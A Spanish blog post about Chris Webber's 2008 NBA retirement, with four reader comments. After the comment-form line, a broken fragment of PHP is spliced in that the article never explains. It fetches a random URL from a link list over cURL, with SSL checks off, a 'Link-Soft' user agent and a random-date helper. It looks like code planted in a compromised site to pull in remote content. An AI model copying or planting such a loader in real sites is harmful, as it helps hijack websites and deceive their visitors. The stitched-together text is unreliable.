La rodilla de Webber dijo basta

26 de March de 2008 por Gallis

Dice un personaje shakesperiano que cuando lo único que te queda es caer, cómo caer es lo único que importa. El paso de los años sin duda le habrá enseñado esta lección a uno de los más grandes jugadores de la historia reciente de la NBA, que hoy nos abandona. Y es que Chris Webber ha anunciado que, tras 15 años de carrera, se retira. Después de que hubiera rechazado ofertas multimillonarias de equipos europeos, Don Nelson rescató a Webber del ostracismo el pasado mes de enero y permitió, en un guiño casi nostálgico, volver a verle con la camiseta con la que debutó en la NBA, allá por 1993. Nueve partidos han bastado para que su rodilla dijera basta, pero aunque este no fuera el final soñado por Webber, es un gran final. Golden State, Washington, Sacramento, Philadelphia, Detroit y, de nuevo, la bahía de Oakland, son, junto a su Michigan natal, las ciudades que han podido disfrutar de su clase, su estilo y su finura.

 

 Pocos jugadores podrían haber firmado una carrera tan brillante (20.7 puntos, 9.8 rebotes, 4.2 asistencias y casi 1.5 robos y 1.5 tapones en 831 partidos), tras quedar tan marcado como quedó Webber en su época universitaria. Líder de los Fab Five de Michigan, 2 derrotas seguidas en la final universitaria, incluyendo aquel famoso time out contra North Carolina, habrían acabado con la carrera del más pintado, pero Webber salió adelante y se hizo un nombre y un hueco en la mejor liga del mundo. Todos le recordaremos por su etapa en los Sacramento Kings… aquel equipo ye ye, el tocata, la tortilla de patatas. El serbio Vlade Divac y él formaban un juego interior sensacional, de esos que hacen que merezca la pena quedarte despierto hasta casi las 8 de la mañana para ver un partido. Nunca tuvo Webber la fama tan cerca como en aquel año 2002 en el que Robert Horry decidió aumentar las leyendas de ambos. A partir de ahí, su carrera comenzó un lento pero imparable declive. Y cuando muchos creíamos que el dios del baloncesto había decidido darle en sus últimos días lo que siempre le negó, Lebron James se cruzó en su camino y en el de los Pistons y se encargó de no manchar su impecable currículo de perdedor.

Pero Webber siempre fue de aquellos que “saben” perder. Sin duda fue el emblema de aquellos Kings que, gracias a su baloncesto, se convirtió, me atrevería a decir, en el segundo equipo de casi todos los aficionados a la NBA a comienzos del Siglo 21. Excepción hecha, quizá, de los miembros de la fiebre amarilla, ya que los enfrentamientos entre Lakers y Kings se convirtieron en todo un clásico. Con el tiempo la leyenda quedará atrás y en la memoria de los aficionados quedarán sus tiros de 5 metros, sus pases por la espalda, la finura de sus movimientos, su clase y así un largo etcétera. Si vas a caer, hazlo con estilo. Por supuesto, su carrera no está exenta de éxitos: número 1 del draft, Rookie del año, 5 veces allstar, miembro del mejor equipo de la liga en 2001, el más que posible ingreso en el Hall of Fame… y por supuesto, el reconocimento de quienes jugaron con y contra él, así como el de todos aquellos que disfrutamos, gracias a él, de este maravilloso deporte llamado baloncesto.

Comenta

4 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    Grande Webber y grandes esas Queens 😀

    Y gran artículo, claro.

      Citar

  2. Dantley dice:
    #2

    Gran introducción.

    Webber es lo que pudo ser y no fue. Si se mide el deporte por grandes victorias ya sabemos que Webber nunca estará en ningún Olimpo. Pero si el deporte se mide en abstracto, si se pudiera aislar el valor baloncestístico en este caso, del valor de un deportista como competidor de élite, Webber ha sido uno de los más grandes. Por comparar, me quedo con Webber antes que con Malone o Barkley. Por supuesto que esos dos eran más competitivos (y a fin de cuentas, ¿qué ganaron?), pero Webber ha sido “más baloncesto”.

    En una NBA donde además los 4 cada vez son menos pasadores y menos estilistas, se le echa de menos.

      Citar

  3. TheDeerHunter dice:
    #3

    Lo cierto es que Webber es el exponente máximo del injusto y efímero concepto que a veces tenemos del baloncesto.
    Hace unas pocas semanas ESPN publicó una serie de artículos con los 10 mejores jugadores en cada posición. Resulta sorprendente lo mal que están repartidos los anillos entre todos ellos (en el top 10 de escoltas hay 4 sin anillo, en bases hay 3, en AP 5…) e incluso alguno de ellos ganó su anillo de rebote, o hay casos flagrantes como el de Jerry West (1 sólo título en 9 finales)
    A pesar de ello, todos (yo el primero) nos aferramos lamentablemente a ese concepto idealizado de la victoria por encima de todas las cosas. Algo que al fin y al cabo es sólo una circunstancia más del juego que depende de muchísimos factores, seguramente mucho más determinantes que la propia calidad del jugador.
    Pocos han estado tan cerca de esa gloria de lo que estuvo Webber… muchos menos lo han estado de hacerlo como él lo hubiera hecho, con el estilo que precísamente buscamos los aficionados a este deporte. Jugando bien.
    Fueron muchas las circunstancias que se han aliado en su contra… una de ellas fue la combinación de nada más y nada menos que Shaq, Kobe y una jugada afortunada (gracias a los astros)
    Que nadie cometa la imprudencia de considerarlo un perdedor… (que se lo digan a su cuenta corriente ;D)

      Citar

  4. Jabho dice:
    #4

    Pues sin duda un grande, grandísimo jugador. Y como decis una especie en estinción en un mundo de 4´s rocosos, duros atleticos pero con limitada visión de juego….

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>